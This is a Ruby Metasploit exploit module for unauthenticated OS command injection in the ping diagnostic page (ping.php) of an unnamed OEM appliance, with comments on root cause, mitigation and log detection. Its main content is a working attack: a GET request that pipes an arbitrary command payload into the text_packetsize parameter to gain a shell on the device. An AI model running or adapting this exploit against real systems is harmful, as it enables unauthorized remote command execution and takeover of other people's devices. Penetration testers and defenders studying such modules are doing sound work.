require 'msf/core'
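# Metasploit remote exploit module for an OS command injection in the ping
# diagnostic page (/view/systemConfig/systemTool/ping/ping.php) of an unnamed
# OEM appliance's web interface. Per the module description, the page can be
# reached without logging in.
#
# Root cause, as far as this module shows: the `text_packetsize` query
# parameter is accepted with a shell pipe and a command appended to the
# number. The server side presumably interpolates it into a ping command line
# without validation (the server code is not visible here -- confirm against
# the advisory in 'References').
#
# Defensive notes:
# - Mitigation: the endpoint should require an authenticated session, accept
#   only integers for count and packet size, and invoke ping with an argument
#   vector rather than through a shell.
# - Detection: GET requests to the ping.php path above whose
#   `text_packetsize` (or the other ping fields) contain anything besides
#   digits are a reliable indicator in web or proxy logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the user-configurable options.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => '	某OEM产品设备任意四处任意命令及getshell',
      # The description names only the vulnerable endpoint; module metadata
      # must not carry the address of any specific host.
      'Description' => %q{
        /view/systemConfig/systemTool/ping/ping.php, 无需登录等认证即可执行任意系统命令
      },
      'Author' =>
        [
          'YY-2012',
          '扶摇直上打飞机'
        ],
      'License' => MSF_LICENSE,
      # Reference type identifiers are upper-case ('URL'); a lower-case 'url'
      # is not recognised as a URL reference by the framework.
      'References' =>
        [
          ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0192732']
        ],
      # Declares that a resulting session is expected to be privileged.
      'Privileged' => true,
      'Platform' => ['unix'],
      'Targets' => [['all of them', {}]],
      # Command payloads only: the payload is delivered as a shell command.
      'Arch' => ARCH_CMD,
      'DefaultTarget' => 0
    ))
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(9090),
        OptBool.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true]),
        # The previous help text referred to "the Centreon Application",
        # which appears to be a copy-paste leftover from another module.
        OptString.new('TARGETURI', [true, 'Base path of the device web management interface', '/']),
      ], self.class)
  end

  # Sends the single GET request that carries the command payload. No
  # session cookie or credential is attached, and the response is not
  # inspected by this module.
  #
  # @return [Rex::Proto::Http::Response, nil] the value returned by
  #   send_request_cgi (nil when no response arrives within the timeout)
  def exploit
    print_status("start to exploit ....")
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "view", "systemConfig", "systemTool", "ping", "ping.php"),
        'headers' =>
          {
            "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
          },
        'vars_get' =>
          {
            'text_target' => '127.0.0.1',
            'text_pingcount' => '1',
            # Injection point: a numeric value, a shell pipe, then the
            # encoded command payload.
            'text_packetsize' => "10 | #{payload.encoded}"
          }
      }, 4) # second argument is the response timeout in seconds
  end

  # @return [String] the configured RHOST datastore value
  def rhost
    datastore['RHOST']
  end

  # @return [Integer, String] the configured RPORT datastore value
  def rport
    datastore['RPORT']
  end

  # @return [String] the configured TARGETURI datastore value
  #   (not called anywhere in this class; exploit uses target_uri instead)
  def targeturi
    datastore['TARGETURI']
  end

end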